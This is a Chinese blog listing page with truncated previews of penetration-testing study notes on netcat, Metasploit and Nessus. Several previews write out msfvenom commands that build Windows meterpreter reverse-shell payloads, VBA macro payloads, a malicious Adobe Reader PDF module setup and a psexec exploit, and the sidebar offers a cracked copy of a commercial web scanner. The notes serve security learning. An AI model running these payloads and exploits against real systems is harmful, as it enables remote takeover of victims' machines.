- 博客(16)
- 资源 (4)
- 收藏
- 关注
原创 NC学习笔记
NC(ncat)学习笔记nc -nv 1.1.1.1 80 ##接口探测,发起链接文本交互A:nc -l -p 4444B:nc -vn 1.1.1.1 4444nc -nv 1.1.1.1 4444 -q 1 ##输出结束1秒后结束链接传输文件接收端:nc -lp 4444 > 1.doc发送端:nc -nv 1.1.1.1 4...
2018-02-24 16:04:24 979
原创 MSF学习笔记(11)
本地提权漏洞检测meterpreter > run post/multi/recon/local_exploit_suggester 迁移到指定进程migrate -N explorer.exe自动脚本msf exploit(multi/handler) > set AutoRunScript migrate -n explorer.exemsf ...
2018-02-12 10:43:01 961
原创 nessus更新
nessus安装下载https://www.tenable.com/downloads/nessus安装rpm -ivh Nessus-7.0.1-es6.x86_64.rpm 启动service nessusd startWEB访问https://127.0.0.1:8834/激活激活码获取地址https://w...
2018-02-08 16:25:40 7935
原创 MSF学习笔记(10)
宏代码生成root@kaliroot@kali:~/Desktop# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=5555 -e x86/shikata_ga_nai -f vba-exe利用session 扩大战果生成后门s
2017-12-11 17:11:52 721
原创 MSF学习笔记(9)
利用adobe reader漏洞执行payload 构造pdf文件msf > use exploit/windows/fileformat/adobe_utilprintf msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcpmsf exploit(adobe_utilprintf) > set
2017-12-07 11:40:35 586
原创 MSF学习笔记(8)
payload 生成windows 执行payload生成msfvenom --payload-options -p windows/shell/reverse_tcp ##查看需要配置的optionsmsfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00"
2017-12-05 15:32:12 346
原创 MSF学习笔记(7)
msf弱点扫描模块使用openvas引入openvas进行扫描,全命令行,使用繁琐msf > load openvas 导入openvas扫描日志,.nbe格式msf > db_import openvas.nbenessus导入nessus模块进行扫描msf > load nessus[*] Nessus Bridge for Metasploit[*] Type nessus_help f
2017-12-05 12:05:43 734
原创 MSF学习笔记(6)
MSF WEB应用扫描器wmapmsf > load wmap #load wmap模块msf > help #查看wmap可用命令wmap Commands ============= Command Description ------- ----------- wmap_modules Manage wmap modules wma
2017-12-05 11:00:46 696
原创 msf学习笔记(5)
MSF弱点扫描vnc密码破解use auxiliary/scanner/vnc/vnc_loginvnc无密码访问use auxiliary/scanner/vnc/vnc_none_authRDP远程桌面漏洞use auxiliary/scanner/rdp/ms12_020_check设备后门use auxiliary/scanner/ssh/juniper_backdooruse auxil
2017-11-03 17:50:18 459
原创 msf学习笔记(4)
MSF信息收集nmap扫描db_nmap -sV 192.168.1.1auxiliary扫描模块RHOSTS <>RHOST 192.168.1.1-24 192.168.1.1/24 files:/root/ip.txtarp扫描msf > use auxiliary/scanner/discovery/arp_sweep set INTERFACE ̵ RHOSTS̵ SHOST̵ S
2017-11-03 14:08:44 1117
原创 msf学习笔记(3)
meterpreter高级、动态、可扩展的Payload基础命令helpbackgroundcddir / lscatmkdirrmdirmvrm edit #编辑目标文件lpwd #显示本地目录lcd #进入本地目录download #下载到lpwd目录upload #上传execute -f cmd.exe -i -H #执行程序进阶命
2017-11-03 10:28:13 365
原创 msf学习笔记(2)
exploit分类Active exploit示例:msf > use exploit/windows/smb/psexecmsf exploit(psexec) > set rhost 192.168.1.100rhost => 192.168.1.100msf exploit(psexec) > set payload windows/shell/reverse_tcppayload =
2017-11-02 17:13:34 554
原创 msf 学习笔记(1)
msf数据库链接root@kali:~# msfdb reinit ##数据库重建root@kali:~# msfdb init ##数据库链接root@kali:~# service postgresql start ##启动pgsql数据库(5432接口未启动状态【netstat -pantu | grep 5432】)root@kali:~# msfdb start
2017-10-20 14:21:08 1359
信息安全工程师_软考_真题_word版_不含答案_2016-2019_密码zhenti.zip
2020-09-02
信息安全工程师_软考_真题_2016-2019_密码zhenti.zip
2020-09-02
Acunetix Web Vulnerability Scanner,经典WEB安全工具,AWVS10.5破解版。
2018-04-13
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人